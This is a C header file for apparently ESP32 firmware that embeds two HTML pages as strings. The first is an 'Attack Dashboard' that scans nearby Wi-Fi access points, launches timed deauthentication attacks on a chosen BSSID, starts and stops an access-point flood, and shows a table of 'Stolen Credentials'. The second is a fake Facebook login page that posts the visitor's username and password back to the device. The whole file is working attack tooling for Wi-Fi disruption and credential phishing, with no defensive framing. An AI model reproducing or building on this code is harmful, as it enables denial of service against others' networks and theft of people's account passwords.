#ifndef HTML_PAGES_H
#define HTML_PAGES_H

char* root_page_html =
"<!DOCTYPE html>\n"
"<html lang=\"en\">\n"
"<head>\n"
"  <meta charset=\"UTF-8\" />\n"
"  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />\n"
"  <title>ESP32 Wi-Fi Attack Control</title>\n"
"  <link\n"
"    rel=\"stylesheet\"\n"
"    href=\"https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css\"\n"
"  />\n"
"</head>\n"
"<body>\n"
"  <div class=\"container my-4\">\n"
"    <h1 class=\"mb-4\">ESP32 Attack Dashboard</h1>\n"
"\n"
"    <!-- Scan Section -->\n"
"    <div class=\"card mb-4\">\n"
"      <div class=\"card-header\">Scan Nearby APs</div>\n"
"      <div class=\"card-body\">\n"
"        <button id=\"btn-scan\" class=\"btn btn-primary\">Scan</button>\n"
"        <div id=\"scan-error\" class=\"text-danger mt-2\" style=\"display:none;\">\n"
"          Error scanning networks.\n"
"        </div>\n"
"        <table\n"
"          id=\"scan-table\"\n"
"          class=\"table table-striped mt-3\"\n"
"          style=\"display:none;\"\n"
"        >\n"
"          <thead>\n"
"            <tr>\n"
"              <th>SSID</th>\n"
"              <th>BSSID</th>\n"
"              <th>Deauthenticate</th>\n"
"            </tr>\n"
"          </thead>\n"
"          <tbody></tbody>\n"
"        </table>\n"
"      </div>\n"
"    </div>\n"
"\n"
"    <!-- Flood Section -->\n"
"    <div class=\"card mb-4\">\n"
"      <div class=\"card-header\">AP Flood</div>\n"
"      <div class=\"card-body\">\n"
"        <button id=\"btn-flood\" class=\"btn btn-warning\">Start Flood</button>\n"
"        <button id=\"btn-flood-stop\" class=\"btn btn-danger\">Stop Flood</button>\n"
"        <div id=\"flood-status\" class=\"mt-2\"></div>\n"
"      </div>\n"
"    </div>\n"
"\n"
"    <!-- Facebook Leak Section -->\n"
"    <div class=\"card mb-4\">\n"
"      <div class=\"card-header\">Stolen Credentials</div>\n"
"      <div class=\"card-body\">\n"
"        <button id=\"btn-facebook\" class=\"btn btn-secondary\">Load</button>\n"
"        <div id=\"facebook-error\" class=\"text-danger mt-2\" style=\"display:none;\">\n"
"          Error loading credentials.\n"
"        </div>\n"
"        <table\n"
"          id=\"facebook-table\"\n"
"          class=\"table table-bordered mt-3\"\n"
"          style=\"display:none;\"\n"
"        >\n"
"          <thead>\n"
"            <tr>\n"
"              <th>Username</th>\n"
"              <th>Password</th>\n"
"            </tr>\n"
"          </thead>\n"
"          <tbody></tbody>\n"
"        </table>\n"
"      </div>\n"
"    </div>\n"
"  </div>\n"
"\n"
"  <script>\n"
"    document.getElementById('btn-scan').onclick = async () => {\n"
"      const table = document.getElementById('scan-table');\n"
"      const tbody = table.querySelector('tbody');\n"
"      document.getElementById('scan-error').style.display = 'none';\n"
"      table.style.display = 'none';\n"
"      tbody.innerHTML = '';\n"
"\n"
"      try {\n"
"        const res = await fetch('/scan');\n"
"        if (res.status !== 200) throw new Error();\n"
"        const aps = await res.json();\n"
"        aps.forEach(ap => {\n"
"          const tr = document.createElement('tr');\n"
"          tr.innerHTML = `\n"
"            <td>${ap.ssid}</td>\n"
"            <td>${ap.bssid}</td>\n"
"            <td>\n"
"              <button class=\"btn btn-sm btn-danger\" onclick=\"deauth('${ap.bssid}')\">\n"
"                Deauth\n"
"              </button>\n"
"            </td>`;\n"
"          tbody.appendChild(tr);\n"
"        });\n"
"        table.style.display = '';\n"
"      } catch {\n"
"        document.getElementById('scan-error').style.display = '';\n"
"      }\n"
"    };\n"
"\n"
"    async function deauth(bssid) {\n"
"      const timeout = parseInt(prompt('Duration (seconds)?', '30'), 10);\n"
"      if (!timeout || isNaN(timeout) || timeout <= 0) return;\n"
"\n"
"      const res = await fetch(`/attack?bssid=${bssid}&timeout=${encodeURIComponent(timeout)}`);\n"
"      if (res.status === 200) {\n"
"        showCountdown(timeout);\n"
"      } else if (res.status === 400) {\n"
"        alert('Missing parameters');\n"
"      } else {\n"
"        alert('Failed to start attack');\n"
"      }\n"
"    }\n"
"\n"
"    function showCountdown(seconds) {\n"
"      // Replace entire body with countdown message\n"
"      document.body.innerHTML = `\n"
"        <div class=\"d-flex vh-100 vw-100 align-items-center justify-content-center bg-dark text-white flex-column\">\n"
"          <h1>Deauthentication in progress</h1>\n"
"          <p>Please wait <span id=\"countdown\">${seconds}</span> seconds...</p>\n"
"        </div>\n"
"      `;\n"
"      let remaining = seconds;\n"
"      const el = document.getElementById('countdown');\n"
"\n"
"      const interval = setInterval(() => {\n"
"        remaining--;\n"
"        if (remaining >= 0) {\n"
"          el.textContent = remaining;\n"
"        }\n"
"        if (remaining <= 0) {\n"
"          clearInterval(interval);\n"
"          document.body.innerHTML = `\n"
"            <div class=\"d-flex vh-100 vw-100 align-items-center justify-content-center bg-dark text-white flex-column\">\n"
"              <h1>Attack Finished</h1>\n"
"              <p>Please reconnect to the ESP32 Wi-Fi network and <strong>refresh</strong> this page.</p>\n"
"            </div>\n"
"          `;\n"
"        }\n"
"      }, 1000);\n"
"    }\n"
"\n"
"    // Flood controls\n"
"    const floodStatusEl = document.getElementById('flood-status');\n"
"    async function updateFloodButtons() {\n"
"      try {\n"
"        const res = await fetch('/flood/stop');\n"
"        if (res.status === 409) {\n"
"          document.getElementById('btn-flood').disabled = false;\n"
"          document.getElementById('btn-flood-stop').disabled = true;\n"
"          floodStatusEl.textContent = 'Flood not running';\n"
"        } else {\n"
"          throw new Error();\n"
"        }\n"
"      } catch {\n"
"        document.getElementById('btn-flood').disabled = true;\n"
"        document.getElementById('btn-flood-stop').disabled = false;\n"
"        floodStatusEl.textContent = 'Flood is running';\n"
"      }\n"
"    }\n"
"\n"
"    document.getElementById('btn-flood').onclick = async () => {\n"
"      const res = await fetch('/flood');\n"
"      if (res.status === 200) {\n"
"        alert('Flood started');\n"
"      } else alert('Cannot start flood');\n"
"      document.getElementById('btn-flood').disabled = true;\n"
"      document.getElementById('btn-flood-stop').disabled = false;\n"
"      floodStatusEl.textContent = 'Flood is running';\n"
"    };\n"
"\n"
"    document.getElementById('btn-flood-stop').onclick = async () => {\n"
"      const res = await fetch('/flood/stop');\n"
"      if (res.status === 200) {\n"
"        alert('Flood stopped');\n"
"      } else alert('Flood not running');\n"
"      updateFloodButtons();\n"
"    };\n"
"\n"
"    // Initial flood status\n"
"    updateFloodButtons();\n"
"\n"
"    // Facebook credentials\n"
"    document.getElementById('btn-facebook').onclick = async () => {\n"
"      const table = document.getElementById('facebook-table');\n"
"      const tbody = table.querySelector('tbody');\n"
"      document.getElementById('facebook-error').style.display = 'none';\n"
"      table.style.display = 'none';\n"
"      tbody.innerHTML = '';\n"
"\n"
"      try {\n"
"        const res = await fetch('/facebook');\n"
"        if (res.status !== 200) throw new Error();\n"
"        const creds = await res.json();\n"
"        creds.forEach(entry => {\n"
"          const tr = document.createElement('tr');\n"
"          tr.innerHTML = `\n"
"            <td>${entry.username}</td>\n"
"            <td>${entry.password}</td>`;\n"
"          tbody.appendChild(tr);\n"
"        });\n"
"        table.style.display = '';\n"
"      } catch {\n"
"        document.getElementById('facebook-error').style.display = '';\n"
"      }\n"
"    };\n"
"  </script>\n"
"</body>\n"
"</html>\n";

const char* facebook_page_html = 
"<!DOCTYPE html>\n"
"<html lang=\"en\">\n"
"  <head>\n"
"    <meta charset=\"UTF-8\" />\n"
"    <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" />\n"
"    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n"
"    <title>Facebook Login Page</title>\n"
"    <style>\n"
"@import url(\"https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap\");\n"
"* { margin: 0; padding: 0; box-sizing: border-box; }\n"
"body { font-family: \"Poppins\", sans-serif; background: #f2f4f7; }\n"
".content { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); }\n"
".flex-div { display: flex; justify-content: space-evenly; align-items: center; }\n"
".name-content { margin-right: 7rem; }\n"
".name-content .logo { font-size: 3.5rem; color: #1877f2; }\n"
".name-content p { font-size: 1.3rem; font-weight: 500; margin-bottom: 5rem; }\n"
"form { display: flex; flex-direction: column; background: #fff; padding: 2rem; width: 530px; height: 380px; border-radius: 0.5rem; box-shadow: 0 2px 4px rgb(0 0 0 / 10%), 0 8px 16px rgb(0 0 0 / 10%); }\n"
"form input { outline: none; padding: 0.8rem 1rem; margin-bottom: 0.8rem; font-size: 1.1rem; }\n"
"form input:focus { border: 1.8px solid #1877f2; }\n"
"form .login { outline: none; border: none; background: #1877f2; padding: 0.8rem 1rem; border-radius: 0.4rem; font-size: 1.1rem; color: #fff; }\n"
"form .login:hover { background: #0f71f1; cursor: pointer; }\n"
"form a { text-decoration: none; text-align: center; font-size: 1rem; padding-top: 0.8rem; color: #1877f2; }\n"
"form hr { background: #f7f7f7; margin: 1rem; }\n"
"form .create-account { outline: none; border: none; background: #06b909; padding: 0.8rem 1rem; border-radius: 0.4rem; font-size: 1.1rem; color: #fff; width: 75%; margin: 0 auto; }\n"
"form .create-account:hover { background: #03ad06; cursor: pointer; }\n"
"@media (max-width: 500px) {\n"
"  html { font-size: 60%; }\n"
"  .name-content { margin: 0; text-align: center; }\n"
"  form { width: 300px; height: fit-content; }\n"
"  form input, form .login, form a, form .create-account { font-size: 1.5rem; margin-bottom: 1rem; }\n"
"  .flex-div { flex-direction: column; }\n"
"}\n"
"@media (min-width: 501px) and (max-width: 768px) {\n"
"  html { font-size: 60%; }\n"
"  .name-content { margin: 0; text-align: center; }\n"
"  form { width: 300px; height: fit-content; }\n"
"  form input, form .login, form a, form .create-account { font-size: 1.5rem; margin-bottom: 1rem; }\n"
"  .flex-div { flex-direction: column; }\n"
"}\n"
"@media (min-width: 769px) and (max-width: 1200px) {\n"
"  html { font-size: 60%; }\n"
"  .name-content { margin: 0; text-align: center; }\n"
"  form { width: 300px; height: fit-content; }\n"
"  form input, form .login, form a, form .create-account { font-size: 1.5rem; margin-bottom: 1rem; }\n"
"  .flex-div { flex-direction: column; }\n"
"}\n"
"@media (orientation: landscape) and (max-height: 500px) {\n"
"  .header { height: 90vmax; }\n"
"}\n"
"    </style>\n"
"  </head>\n"
"  <body>\n"
"    <div class=\"content\">\n"
"      <div class=\"flex-div\">\n"
"        <div class=\"name-content\">\n"
"          <h1 class=\"logo\">Facebook</h1>\n"
"          <p>Connect with friends and the world around you on Facebook.</p>\n"
"        </div>\n"
"        <form method=\"post\">\n"
"          <input type=\"text\" name=\"username\" placeholder=\"Email or Phone Number\" required />\n"
"          <input type=\"password\" name=\"password\" placeholder=\"Password\" required />\n"
"          <button type=\"submit\" class=\"login\">Log In</button>\n"
"          <a href=\"#\">Forgot Password ?</a>\n"
"          <hr />\n"
"          <button class=\"create-account\">Create New Account</button>\n"
"        </form>\n"
"      </div>\n"
"    </div>\n"
"  </body>\n"
"</html>\n";


#endif // HTML_PAGES_H